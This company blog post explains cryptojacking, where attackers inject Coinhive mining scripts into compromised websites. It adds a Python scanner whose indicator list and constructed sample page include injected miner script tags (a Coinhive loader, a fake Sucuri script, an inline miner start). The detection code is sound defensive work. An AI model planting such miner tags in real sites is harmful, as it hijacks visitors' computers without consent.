Cryptojacking: Hacking for Bitcoins
This is a brief follow-up to my previous article on Hacking for Bitcoins, in which I detailed how servers were being hijacked with cryptocurrency miners that used your servers' CPU power to mine Bitcoin or other blockchain cryptocurrencies. This is an updated twist on that hack. I saw this Ars Technica article today, and it points out that the newer twist is to inject code into your website's code and then run the cryptocurrency mining on your website users' computers. This distributes the CPU work across thousands of visitors' machines instead of just taking over a few of your servers.
To do this, hackers are using Coinhive.com, which offers an easy-to-use programming interface that lets you set up your own website to mine cryptocurrency on your visitors' computers. There is no requirement to notify users that you are going to do this. What hackers are doing is using vulnerabilities in your server(s) and/or website(s) to inject this code into your website. It is estimated that about 2,500 websites are currently compromised and using their visitors to mine cryptocurrency. The Ars Technica article indicates that most of them appear to be connected to two Coinhive.com accounts, which might mean the hackers can be traced and stopped fairly easily. But others will surely follow in their path.
How do I know?
When cryptojacking occurs, a direct side effect is that the website users' CPUs are maxed out and system heat starts to increase. This is a telltale sign that the website you are using is either using your computer for its own gain or has been compromised and a hacker is using your computer for their gain. (It could also be one of those annoying Flash-based ads that we all hate.) Check the site's source code to see if there is anything linking to Coinhive or similar. Ars Technica also reported: “Most of the affected sites concealed the connection to Coinhive by adding a link to the domain siteverification.online or one masquerading as a Sucuri firewall.”
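As an added illustration of the "check the site source code" advice (example code written for this post, not from Ars Technica, Malwarebytes or Coinhive), here is a small scanner that flags script tags referencing the indicators named above. The Coinhive loader and constructor names are the publicly documented ones; the Sucuri check is a heuristic assumption, and the sample page, hostnames and site key are constructed.

```python
import re

# Indicators from this post (Coinhive, siteverification.online) plus the
# publicly documented Coinhive loader and constructor names; extend as needed.
INDICATORS = {
    "coinhive.com": "Coinhive miner domain",
    "coinhive.min.js": "Coinhive loader script",
    "CoinHive.Anonymous": "Coinhive inline miner constructor",
    "siteverification.online": "domain used to conceal the Coinhive connection",
}
SCRIPT_RE = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.I | re.S)
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.I)

def host_of(url):
    """Hostname of an absolute or protocol-relative URL ('' for relative paths)."""
    m = re.match(r"^(?:https?:)?//([^/?#]+)", url, re.I)
    return m.group(1).lower() if m else ""

def scan_html(html):
    """Return (location, reason) pairs for script tags that look like miner hooks."""
    hits = []
    for attrs, body in SCRIPT_RE.findall(html):
        src = SRC_RE.search(attrs)
        if src:
            url = src.group(1)
            for needle, why in INDICATORS.items():
                if needle.lower() in url.lower():
                    hits.append((url, why))
            # Heuristic (assumption): a script named after Sucuri but served from a
            # host outside sucuri.net matches the "masquerading as Sucuri" trick.
            if "sucuri" in url.lower() and not host_of(url).endswith("sucuri.net"):
                hits.append((url, "script impersonating Sucuri from a non-Sucuri host"))
        for needle, why in INDICATORS.items():
            if needle in body:
                hits.append(("inline script", why))
    return hits

# Constructed sample page: one ordinary third-party tag plus three injected ones.
SAMPLE = """<html><head>
<script src="https://tag.example-analytics.test/tag.js"></script>
<script src="//siteverification.online/lib/coinhive.min.js"></script>
<script src="https://cdn.example-bad.test/sucuri-firewall.js"></script>
<script>var m = new CoinHive.Anonymous('SITE_KEY_PLACEHOLDER'); m.start();</script>
</head><body>Welcome</body></html>"""

if __name__ == "__main__":
    for where, why in scan_html(SAMPLE):
        print(f"{why}: {where}")
```

Run it against a saved copy of a suspect page; a clean page yields an empty list, while the sample above produces four findings.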
This is a growing problem: Malwarebytes recently reported that it blocks about 8 million connections per day to unauthorized mining pages. People who want to avoid these cryptojacking scams can use Malwarebytes or another antivirus program that blocks abusive pages.
From our point of view at CF Webtools, this is a good reminder to make sure your ColdFusion servers are secure, updated and patched. It is also a good reason why your website code (all code, really) should be kept in a secured version control system. That way, if something like this did happen to your website, you can replace the code from a known clean copy instead of digging through it looking for the injected code. Additionally, CF Webtools offers PenTesting to check your website code for vulnerabilities. If you need help upgrading your VM or patching your server (or anything else), our operations group is standing by 24/7 – give us a call at 402-408-3733, or send a note to operations at cfwebtools.com.